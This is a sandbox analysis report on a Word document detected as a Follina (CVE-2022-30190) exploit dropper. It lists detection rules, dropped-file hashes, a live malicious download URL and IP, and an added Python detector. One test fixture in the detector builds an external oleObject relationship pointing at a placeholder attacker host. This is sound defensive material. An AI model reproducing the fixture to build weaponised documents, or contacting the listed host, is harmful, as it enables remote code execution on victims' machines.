Windows
Analysis Report
V3g2Pfu707.docx
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- WINWORD.EXE (PID: 2096 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- cleanup
Rule | Description | Author |
---|---|---|
SUSP_Doc_WordXMLRels_May22 | Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard, Wojciech Cieslak |
INDICATOR_OLE_RemoteTemplate | Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents | ditekSHen |

Rule | Description | Author |
---|---|---|
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Signature section | Signature | Entries |
---|---|---|
AV Detection | Virustotal | 1 |
Exploits | File source | 4 |
Exploits | Extracted files from sample | 1 |
Exploits | File opened | 1 |
Exploits | TCP traffic | 2 |
Networking | Network traffic detected | 22 |
Networking | HTTP traffic detected | 2 |
Networking | TCP traffic | 1 |
Networking | ASN Name | 1 |
Networking | TCP traffic detected without corresponding DNS query | 50 |
Networking | String found in binary or memory | 2 |
Networking | File created | 1 |
Networking | HTTP traffic detected | 2 |
System Summary | Matched rule | 7 |
System Summary | OLE stream indicators for Word, Excel, PowerPoint, and Visio | 1 |
System Summary | Virustotal | 1 |
System Summary | LNK file | 1 |
System Summary | File created | 2 |
System Summary | Classification label | 1 |
System Summary | OLE document summary | 3 |
System Summary | File read | 1 |
System Summary | Window detected | 1 |
System Summary | Key opened | 1 |
System Summary | File opened | 1 |
System Summary | Initial sample | 1 |
Persistence and Installation Behavior | Extracted files from sample | 1 |
Hooking and other Techniques for Hiding and Protection | Network traffic detected | 22 |
Hooking and other Techniques for Hiding and Protection | Process information set | 63 |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 12 Exploitation for Client Execution | Path Interception | Path Interception | 1 Masquerading | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 11 Non-Standard Port | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 11 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Ingress Tool Transfer | SIM Card Swap | Carrier Billing Fraud |
Detection | Scanner |
---|---|
34% | Virustotal |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
101.33.231.81 | unknown | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | true |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 647003 |
Start date and time: | 2022-06-16 14:13:24 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 42s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | V3g2Pfu707.docx |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 4 |
Number of new started drivers analysed: | 1 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.troj.expl.evad.winDOCX@1/21@0/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtSetValueKey calls found.
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | 20 associated samples | | malicious | | |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2877652670790817 |
Encrypted: | false |
SSDEEP: | 384:57OTylnrIrEtgN7jrQfv61Nl4zyfv61Nl4zE: |
MD5: | 6904AB7DE9425713FAD0A11309750D7C |
SHA1: | 35141FFA3C07A5303AD32824CBD297816211A3D7 |
SHA-256: | 295E03A904581A4EB96842A2134FC6A26F126B6E3241A3DDE113733E925EA575 |
SHA-512: | 1F1D1C9ECD512366386652D03639747705BA949D0E1B337E79B6C0C3EA6D454ECD4B21A9B8A5D9A68C3F0D50B5BE1A0DB3554A6ECF21DED96672205242A38A1E |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{95873921-7BBD-4EBD-8008-620874EEAE52}.FSD
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.6717296200874917 |
Encrypted: | false |
SSDEEP: | 192:MEf2WSk7edemeEpFeleUgCGliaejealwO1e0eceke:C6KRxFGXta03lwC5vR |
MD5: | 3BF0E4123ADB4A2FCCB85908E1CB24D1 |
SHA1: | F47D6079F6DC2D17589ED5D436D14E29C2965227 |
SHA-256: | 120522FAFFF9C768FB5B3FA42A1CCA5E96A9BC880AEE5AB776C285EAF6471E9F |
SHA-512: | 487F0673870B81CA31F8E8C7D3F12DE298BB5E21E3969C7199BEE498BFFE40F9B0CFF4D3DA185A0C1BDDF270E1FC7E327675F41FE7D856C80D4DB8A20F063780 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.9759175009021157 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlzDlDUXOlYSlHhW8HhWPVylDSlRl/kOQ325l276:yPblzKeVlHs8HsPAlelDsOQQ22 |
MD5: | AFA0867887D275F27B3FA70C0F942FC0 |
SHA1: | 3C7AF5E31DDC45D61D43561837B02ED26B13430E |
SHA-256: | C57A04A07989D8CD43974C5A181B13B22A7D6EF1DCC8793671EF658233EB1FD6 |
SHA-512: | 43B51CCB46AE0EFBB5BD65413EEA85194C482426E85C7EACD827DB6012FD06BDFBB201B7B62BECA100E075EB68345F50342C35F98B8A98BD864087C18F7CFF60 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2886870567135295 |
Encrypted: | false |
SSDEEP: | 1536:1TUrO5yRZOjUWuGfgAi0cEFQPgAi0cEFQ: |
MD5: | B57D30725B2A79ECC6744451F452D8D2 |
SHA1: | E8E52504FE81E162411239F1A737DCA3232F700C |
SHA-256: | 2A1CB4708DB0A4AE9BF3DF4FCC5301BB0B43863E91F5565A3B0441841934CB19 |
SHA-512: | D7B9049BDBC0DF6A372FB1886A5783FB38F79CB79FA5D9E179D2BE548E4DC079D38590FC68302FAFAA2AB8BEAB8DC5C29A9349E0E2FC574318411E0C94F610D3 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{55CA3E23-CD6A-4540-AFBA-3E4A75CEA258}.FSD
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.22209779392510887 |
Encrypted: | false |
SSDEEP: | 48:I3XoUrB6QfKX2CZMG0Wrvoc92ZpasGe4b0embxEembxQ:KYCJSmHja9cpas4b0DbuDby |
MD5: | E0D373C595CA45292224DA7DDF83E5E7 |
SHA1: | 1F89FDBCB9D1D102A6598B1852F7FF0C2DB5F0E0 |
SHA-256: | 25436C64113984DC90AF1D89B8F41EF40858241EF66E7BD2C3AD71C71D8E2010 |
SHA-512: | 29BF632FEE98102379F1C2FE448FAB6C4E59F4C36970D9D13AAE5B5FFE482D3A6D421F1E8AA25097DE40D123D941899C3DE2BB491134B3CB5112B816C2CE39B9 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.917766707190794 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlz91JMlIu5YdYk5llsYDl+ps1o87276:yPblz91CS9YkZs2l+psF22 |
MD5: | 1A06AA9F916046C17E5DA867F5AB3408 |
SHA1: | 173C5E0069A81E2808BD8FE29FCF01A7B19F6944 |
SHA-256: | 74D692C4ED606EDDD9870A8DC9D087FCEE25D02400933E62C45E6A354576FE17 |
SHA-512: | 0D0E0630CF94521A939876AF6E0BFC6AA3B2A05ECE47B56CD5300EF99A5E99F630299A3C9ECE8939CF9BBF34CF2E195E33FAC6556A500E4D652DF2A339E1CD94 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\exploit[1].htm
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 5737 |
Entropy (8bit): | 4.627210073550201 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gz:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiu |
MD5: | 4C00910BAF865F5D0D7F37F77816B375 |
SHA1: | ADA759E7A00B362553580A89269201257BD6F9E0 |
SHA-256: | 32EC74CCEFC7D7FEB5C8817097652FC6014C6217F5B6A2695A95E680D6958153 |
SHA-512: | 9C69E8FA9E1F27C6AB0E464A2E7CD1F89E5CACF671A775DC55045A19F3D5DAE98AF5EF3E973FA021DC7E933505AC8B706EA0F8DDB371BB7414E7A75CF933BE27 |
Malicious: | true |
Yara Hits: | |
Reputation: | low |
IE Cache URL: | http://101.33.231.81:62563/exploit.html |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42A30EFB.htm
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5737 |
Entropy (8bit): | 4.627210073550201 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gz:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiu |
MD5: | 4C00910BAF865F5D0D7F37F77816B375 |
SHA1: | ADA759E7A00B362553580A89269201257BD6F9E0 |
SHA-256: | 32EC74CCEFC7D7FEB5C8817097652FC6014C6217F5B6A2695A95E680D6958153 |
SHA-512: | 9C69E8FA9E1F27C6AB0E464A2E7CD1F89E5CACF671A775DC55045A19F3D5DAE98AF5EF3E973FA021DC7E933505AC8B706EA0F8DDB371BB7414E7A75CF933BE27 |
Malicious: | true |
Yara Hits: | |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6B087DC1.htm
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5737 |
Entropy (8bit): | 4.627210073550201 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gz:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiu |
MD5: | 4C00910BAF865F5D0D7F37F77816B375 |
SHA1: | ADA759E7A00B362553580A89269201257BD6F9E0 |
SHA-256: | 32EC74CCEFC7D7FEB5C8817097652FC6014C6217F5B6A2695A95E680D6958153 |
SHA-512: | 9C69E8FA9E1F27C6AB0E464A2E7CD1F89E5CACF671A775DC55045A19F3D5DAE98AF5EF3E973FA021DC7E933505AC8B706EA0F8DDB371BB7414E7A75CF933BE27 |
Malicious: | true |
Yara Hits: | |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83357E0C.jpeg
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 29235 |
Entropy (8bit): | 7.203733489330109 |
Encrypted: | false |
SSDEEP: | 384:+++r9RfjoOtgBku0d/8wAXLBw75uh62w+ccO+RJPBDJPKQELXu59ghnt8zgmM4CM:++ORjosugKi75u6+vJpDJCBOUK |
MD5: | D7773EE5D4BDFEE97EB233BC5C35C0AA |
SHA1: | 51FFFFC7973C3F4EF6B0B153D66293C1CB8195E7 |
SHA-256: | F6D0AC498CDE70CFBE4F7DF6B86772BC5CFD43F835D09E0C9570D94801917332 |
SHA-512: | 9A0843F34E331B103083A8698C97C76CF99EC05BF83266004DF9D55A7596C39F530E1CCF26B9095461A4552F9B146A746C3651A3135D0F6B647A324A122BF04E |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F1DC677.jpeg
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 492596 |
Entropy (8bit): | 7.89552218174887 |
Encrypted: | false |
SSDEEP: | 12288:rA4G7o32/nTnZurIM8gdYjhNSduRYjeqw3C7Nv:Mx7o32/VeZJj5 |
MD5: | 90BE6B795828441DF1C995671289E431 |
SHA1: | 7368012CA949A57238DC158C0FEF24A2EFCEB359 |
SHA-256: | 4A6A787D4BCE57A66828EB9F0F76A6FCAC265A97E6D091AFA150AAD19885C05B |
SHA-512: | 9DD8D38314E5C40E68DE3B0C0037EA7C0000F25125C37AC9DB95B5638FB4EEAEB35690F11CC51FD958645D84758698040B0A8CB2BA8A1BF60920B121068AD446 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6245E340-9A7D-4D8C-95F3-E607A94CA060}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6144 |
Entropy (8bit): | 2.1877115376323406 |
Encrypted: | false |
SSDEEP: | 48:rQ6PBvJBgJB5ihRmJB5ixBvJBegJB5ixBvJB:c6PNgohRWoxNegoxN |
MD5: | C1EFD08AF15B2646E7E58B4ED1DA37D8 |
SHA1: | 716F3C64BC8EA1044AB10F2771A59A782868DB1F |
SHA-256: | 1AF69959BF135AA7497CB75BC54929B742E8E6AB162CD9162AEB306537D65C2E |
SHA-512: | E0B1F37634E6BC746BD92E3AB72896A4E1F372B2E9523163DEB2608E99F30D5275697702EECFE98FA1941D1E8D98F3BB051510719472E93662418A6BDCA0127F |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6A4592DE-D21D-4642-AE77-FFCC3AAD3185}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F19FE166-8B13-4DD0-BB8B-900FB9050402}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1824 |
Entropy (8bit): | 2.1075477514780117 |
Encrypted: | false |
SSDEEP: | 12:ijs/5M4yZlIbb28RPTtBAwJvbZE9Qf5l6exZEk7Af6BG8Xu2W26:2s/5HyZ+bbHNXAwJeUl6eckBBJ+2o |
MD5: | 20E3896F9ACE5C8E16F06D39C7E6192F |
SHA1: | 3DC106A18E328D474631281AED5B33C3AC0CA9AA |
SHA-256: | DA442265AF95FD57EA0F40A2B15A5E89D9710124219B3CE1CE02B769BAA36A8A |
SHA-512: | AC1EC2683B073F7E570C6E1498CBC974924B5FBCAA1B16D9A780932CB08843F0F3CFB37E4BC31D810BB2CBD917A8AB26E179D874F2EC5B18303186D69B1FADD4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 663 |
Entropy (8bit): | 5.949125862393289 |
Encrypted: | false |
SSDEEP: | 12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF |
MD5: | ED3C1C40B68BA4F40DB15529D5443DEC |
SHA1: | 831AF99BB64A04617E0A42EA898756F9E0E0BCCA |
SHA-256: | 039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A |
SHA-512: | C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.025588219588519305 |
Encrypted: | false |
SSDEEP: | 6:I3DPcUsR97FvxggLRw7WkpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPB+p0qkHvYg3J/ |
MD5: | 4E336F926B821EB3BC7357B677623E4B |
SHA1: | 53212F37EB180DBCD825A0D95F02FA21C5A00354 |
SHA-256: | E432B8B0C8E2378220326628A8E944A71760BE408E13E3AE873E051275E55B5E |
SHA-512: | 0F3E93DFAE7BC4D5FF448C68DB515360A72FA99B0038D9762804ADE9DDD9974B860A4736DC5BD6179D99DE7B57AC4F725CE5C761FFA278C5A791286ED090FF94 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.025535921973679574 |
Encrypted: | false |
SSDEEP: | 6:I3DPc1xb2xFvxggLRNGgSo/RXv//4tfnRujlw//+GtluJ/eRuj:I3DP0b0pJPSopvYg3J/ |
MD5: | 84E60871A4908F5C2C5744274A0DD3C2 |
SHA1: | 274CFF227D6AD39DA4B2B806E88E6DDD35D87D1B |
SHA-256: | E81789A9C4F526731E91F97DBDD6EBCC1387BB060BF4AF538D7DE342293358FD |
SHA-512: | E0AB0A6D9E803C7C709AED603F74BE45A43EA6C8B03AA562C66839C6DD7B00642E03D514BE415890EAA3641407C8221B05A94628FD492DFB24F70F922CBB6E90 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1019 |
Entropy (8bit): | 4.554488836456243 |
Encrypted: | false |
SSDEEP: | 12:895d180gXg/XAlCPCHaXWBlXB/zxkpX+W47WiIlgjuicvb0X4PgNDtZ3YilMMEpm:89Dqk/XTm3xqKpIiNeXADv3qwtiY7h |
MD5: | 7A418A293D958E6DFFD2A70C1ED5FA6E |
SHA1: | 235B0D1BC3D75694FF133A96FD5B2A939447F173 |
SHA-256: | 3628ED0E577657AF12609A617151C16C60A1C30869248D5A9E5EB0D5ADAC7375 |
SHA-512: | 2A9FEBEBEC1604A5F0C4ED255FA902A868CDC60617D7687E4C08A2C5DD41CEFA96D4FD8658DEF18BC4E1CE09F26662D863A9143FEBA0C32B1A17FE19F413CB13 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 72 |
Entropy (8bit): | 4.768980259211505 |
Encrypted: | false |
SSDEEP: | 3:bDuMJlrjmUmxW4FXJmUv:bCgjEZl |
MD5: | 32FE8550A0CCE9FFAAF8160013BCD613 |
SHA1: | D7BC50E67446A06F67C6C11C4A3BF7440C823DB7 |
SHA-256: | D6EEA210607E6CFB420E71EADC5363DE3B85D402064F000B53427B9F24A82C5C |
SHA-512: | 9BD43ED73CCC7D71EA062E2495B7433ECA8B99B49AB04691D1073F2B32EA1C8678F4C161656C8E006FA4572C9C83DEA86DEB9FB2557328A447406D598F00FC9F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l |
MD5: | C5E24006AFAC8C2659023AD09A07EB0F |
SHA1: | 4B7B834BEDADFD0A2764743E021D40C55A51F284 |
SHA-256: | 7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E |
SHA-512: | 673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l |
MD5: | C5E24006AFAC8C2659023AD09A07EB0F |
SHA1: | 4B7B834BEDADFD0A2764743E021D40C55A51F284 |
SHA-256: | 7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E |
SHA-512: | 673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.997351182794523 |
TrID: | |
File name: | V3g2Pfu707.docx |
File size: | 520148 |
MD5: | b60cd79e2c14dbeefa22197f76fc3437 |
SHA1: | 07a2811a3ea7a4a0c84e52cb5a48f1e712b55fd9 |
SHA256: | 6ddab79a6d836f9c1ed9ab3bbe28a074c0c93bd87f55144ed62b23c0032715d1 |
SHA512: | 3c565f6be03534118eaf0b35221a4962d7ff8b64af3408ec72949809e9fe8e935652e38dbdaff8960c5e5b886e81d1c0014cb4981e5fed153833e6877c8a8b21 |
SSDEEP: | 12288:ZTAhQSKy2e6tLkAPqq/Q62J0yLz+hyXF+uObrp:1AGSs5Dqq/Qvz+hQU1 |
TLSH: | A6B423F798435185CB2A58BBD80B829BDCF096B724341DD2BCBC24878BC578E4A67527 |
File Content Preview: | PK...........T-../j...........[Content_Types].xml...j.0.E.....6.J.(.....e.h...4v.......c;5%$64..`..{.Xb...V..|...d..I..[!M....k.@....LY.9.A ....x.s..T...e.......Y......z."...:..Y..n8.....&... ..3.l.b.........$OMc....+..@.j<.p.a.).Y.:].q@...2T.=a)].`....r: |
Icon Hash: | e4e6a2a2a4b4b4a4 |
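The static block above identifies the sample as an OOXML package (the content preview starts with the ZIP signature `PK`). What the hashes do not show is the trait that makes a Follina document dangerous without any macro: a relationship in `word/_rels/document.xml.rels` marked `TargetMode="External"` whose `oleObject` target is an http(s) URL, which Word fetches when the file is opened. The following script is an added example for this report, not part of the Joe Sandbox output or of the sample itself; it builds two minimal .docx packages in memory (one benign, one with a constructed external oleObject relationship pointing at the placeholder host `attacker.invalid`) so it runs offline, and it recomputes MD5/SHA1/SHA-256 so a real file can be matched against the hash block above. The `!` suffix on the constructed target mimics the form seen in public Follina samples.

```python
"""Inspect an OOXML (.docx) archive for relationships that point at external
targets, the loading mechanism abused by Follina / CVE-2022-30190 documents to
pull a remote HTML page carrying an ms-msdt: URI.

Added example for the analysis report; not code from the sandbox vendor or the
sample. The packages built below are constructed in memory and the target URL
is a placeholder, not a real indicator.
"""
import hashlib
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
MSDT_RE = re.compile(r"ms-msdt:", re.IGNORECASE)


def file_hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA-256 of the raw bytes, for comparison with the report's hash block."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def external_relationships(docx_bytes: bytes) -> list:
    """Return every relationship with TargetMode="External" found in any *.rels part.

    Each entry is (part_name, relationship_type_suffix, target). Office resolves
    external relationships at load time, so an External oleObject relationship
    means the document fetches a remote resource as soon as it is opened.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((name, rtype, rel.get("Target", "")))
    return found


def follina_indicators(docx_bytes: bytes) -> list:
    """Flag the two traits of a Follina dropper:
    1. an oleObject relationship whose target is a remote http/https URL, and
    2. an ms-msdt: string anywhere inside the package (some variants embed it).
    """
    hits = []
    for part, rtype, target in external_relationships(docx_bytes):
        if rtype == "oleObject" and target.lower().startswith(("http://", "https://")):
            hits.append(f"external oleObject in {part} -> {target}")
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if MSDT_RE.search(zf.read(name).decode("latin-1")):
                hits.append(f"ms-msdt: URI inside {name}")
    return hits


def build_sample_docx(rels_xml: str) -> bytes:
    """Constructed minimal package: just enough parts for the checks above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed relationship parts: one benign (internal styles only), one with an
# external oleObject target. The host attacker.invalid is a placeholder.
BENIGN_RELS = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
</Relationships>'''

SUSPICIOUS_RELS = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OLE_REL_TYPE}" Target="http://attacker.invalid/payload.html!" TargetMode="External"/>
</Relationships>'''

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("suspicious", SUSPICIOUS_RELS)):
        pkg = build_sample_docx(rels)
        print(label, file_hashes(pkg)["sha256"], follina_indicators(pkg))
```

To run it against the real sample, read the file's bytes and pass them to `follina_indicators`; the remote HTML is deliberately not fetched, so the second check only fires when the ms-msdt: string is inside the package itself.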
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 16, 2022 14:14:13.200647116 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
